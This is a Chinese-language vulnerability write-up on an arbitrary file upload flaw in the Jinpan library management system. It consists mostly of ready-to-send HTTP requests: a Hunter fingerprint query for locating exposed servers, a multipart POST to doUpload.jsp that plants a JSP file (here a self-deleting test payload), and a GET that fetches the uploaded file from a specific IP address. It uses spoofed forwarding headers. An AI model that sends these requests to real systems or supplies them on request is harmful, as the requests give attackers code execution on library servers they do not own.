金盘图书馆系统doUpload存在任意文件上传漏洞
一、漏洞简介
金盘图书馆系统doUpload存在任意文件上传漏洞,攻击者可通过该漏洞获取服务器权限。
二、影响版本
- 金盘图书馆系统
三、资产测绘
- hunter
web.body="/opac/opacRssCollect" - 特征
四、漏洞复现
POST /pages/admin/tools/uploadFile/doUpload.jsp HTTP/1.1
Host:
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:121.0) Gecko/20100101 Firefox/121.0
Content-Length: 235
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Connection: close
Content-Type: multipart/form-data; boundary=----xbkdgks1fwucvok84tce
Upgrade-Insecure-Requests: 1
X-Forwarded-For: 127.0.0.1
X-Originating-IP: 127.0.0.1
X-Remote-Addr: 127.0.0.1
X-Remote-IP: 127.0.0.1
------xbkdgks1fwucvok84tce
Content-Disposition: form-data; name="file";filename="tvrodinjqx.jsp"
<%out.println(111*111);new java.io.File(application.getRealPath(request.getServletPath())).delete();%>
------xbkdgks1fwucvok84tce--
上传文件位置
GET /upload/2024-01-24/1706077745930.jsp HTTP/1.1
Host: 42.247.6.28:9090
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:121.0) Gecko/20100101 Firefox/121.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Connection: close
Upgrade-Insecure-Requests: 1
X-Forwarded-For: 127.0.0.1
X-Originating-IP: 127.0.0.1
X-Remote-Addr: 127.0.0.1
X-Remote-IP: 127.0.0.1
